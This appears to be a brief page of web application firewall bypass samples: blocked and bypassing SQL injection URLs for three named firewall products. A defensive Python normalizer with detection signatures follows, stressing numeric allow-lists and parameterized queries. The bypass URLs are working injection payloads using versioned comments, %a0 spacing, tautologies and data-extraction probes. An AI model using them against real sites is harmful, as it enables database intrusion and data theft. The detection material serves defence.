Summary of WAF Bypass Techniques

Yunsuo (云锁)

Blocked

http://www.test123.com/article.php?id=1%20union%20select%201,2,3

Bypass

http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()

360websec

Blocked

http://www.xxx.com.cn/productshow.php?id=79'

Bypass

http://www.xxx.com.cn/productshow.php?id=79%20||%201=1

WTSWAF 

Blocked

http://www.xxx.com.cn/productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)

Bypass

http://www.xxx.com.cn/productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)
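
Seen from the filtering side, the samples above rely on MySQL versioned comments (`/*!36000union*/`), a `%a0` byte in place of a space, and mixed case. The following is an added example, not code from this page or from any of the products named: it canonicalizes the `id` value before inspection and checks it against a numeric allow-list first. The function names and the signature set are assumptions chosen for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# MySQL executes the body of /*!NNNNN ... */ when the server version is high
# enough, so the wrapper is dropped and the body kept for inspection.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)

# Illustrative signatures (assumption, not a complete rule set).
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b"),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
    "select-func": re.compile(r"\bselect\s+\w+\s*\("),
    "tautology": re.compile(r"(?:\|\||\bor\b)\s*\d+\s*=\s*\d+"),
    "char-probe": re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\("),
}

def normalize(raw_value):
    """Canonicalize a still percent-encoded parameter value."""
    # latin-1 keeps %a0 as U+00A0, which \s below treats as whitespace.
    text = unquote_to_bytes(raw_value).decode("latin-1")
    text = VERSIONED.sub(r" \1 ", text)   # unwrap executable comments
    text = PLAIN.sub(" ", text)           # ordinary comments act as separators
    return re.sub(r"\s+", " ", text).strip().lower()

def inspect_id(raw_value):
    """Return findings for an id parameter that should be a plain integer."""
    text = normalize(raw_value)
    # Allow-list first: anything other than digits is rejected outright.
    findings = [] if re.fullmatch(r"\d+", text) else ["non-numeric-id"]
    # Signatures only add detail for logging and triage.
    findings += [name for name, rx in SIGNATURES.items() if rx.search(text)]
    return findings

# The id values from the URLs on this page.
SAMPLES = [
    "1%20union%20select%201,2,3",
    "-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()",
    "79'",
    "79%20||%201=1",
    "-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)",
    "-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(inspect_id(value), normalize(value))
```

Every sample fails the numeric allow-list regardless of which signatures match, which is why type validation and parameterized queries in the application matter more than the signature list.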